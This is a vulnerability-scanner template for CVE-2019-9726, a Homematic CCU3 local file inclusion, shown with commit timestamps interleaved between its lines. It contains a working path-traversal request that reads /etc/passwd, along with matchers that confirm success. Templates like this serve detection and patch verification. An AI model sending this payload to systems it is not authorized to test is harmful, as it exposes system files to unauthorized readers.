2022-02-25 00:08:03 +00:00
id : CVE-2019-9726
2022-04-22 10:38:41 +00:00
2022-02-25 00:08:03 +00:00
info :
2022-07-08 19:07:55 +00:00
name : Homematic CCU3 - Local File Inclusion
2022-02-25 00:08:03 +00:00
author : 0x_Akoko
severity : high
2022-07-08 19:07:55 +00:00
description : eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to read sensitive files on the system.
2023-09-06 12:53:28 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor.
2022-02-25 00:08:03 +00:00
reference :
- https://atomic111.github.io/article/homematic-ccu3-fileread
2022-07-08 19:07:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-9726
2024-01-29 17:11:14 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
2022-02-25 00:08:03 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-02-25 00:08:03 +00:00
cvss-score : 7.5
cve-id : CVE-2019-9726
cwe-id : CWE-22
2023-12-12 11:07:52 +00:00
epss-score : 0.03616
2024-03-23 09:28:19 +00:00
epss-percentile : 0.91446
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : eq-3
product : ccu3_firmware
2024-01-14 09:21:50 +00:00
tags : cve2019,cve,homematic,lfi,eq-3
2022-02-25 00:08:03 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-25 00:08:03 +00:00
- method : GET
path :
2022-02-27 14:46:53 +00:00
- "{{BaseURL}}/.%00./.%00./etc/passwd"
2022-02-25 00:08:03 +00:00
matchers-condition : and
matchers :
2022-02-27 14:46:53 +00:00
- type : regex
2022-02-25 00:08:03 +00:00
part : body
2022-02-27 14:46:53 +00:00
regex :
- "root:.*:0:0:"
- "bin:.*:0:0:"
condition : or
2022-02-25 00:08:03 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022031bc43dea7cfc90774685068cd90021151fceba9b4b8f74d240f43ffd9da260f022100e9a810e028752235841a1478091eb49535ca89ffbda302ebfc1b39c013e59fca:922c64590222798bb761d5b6d8e72950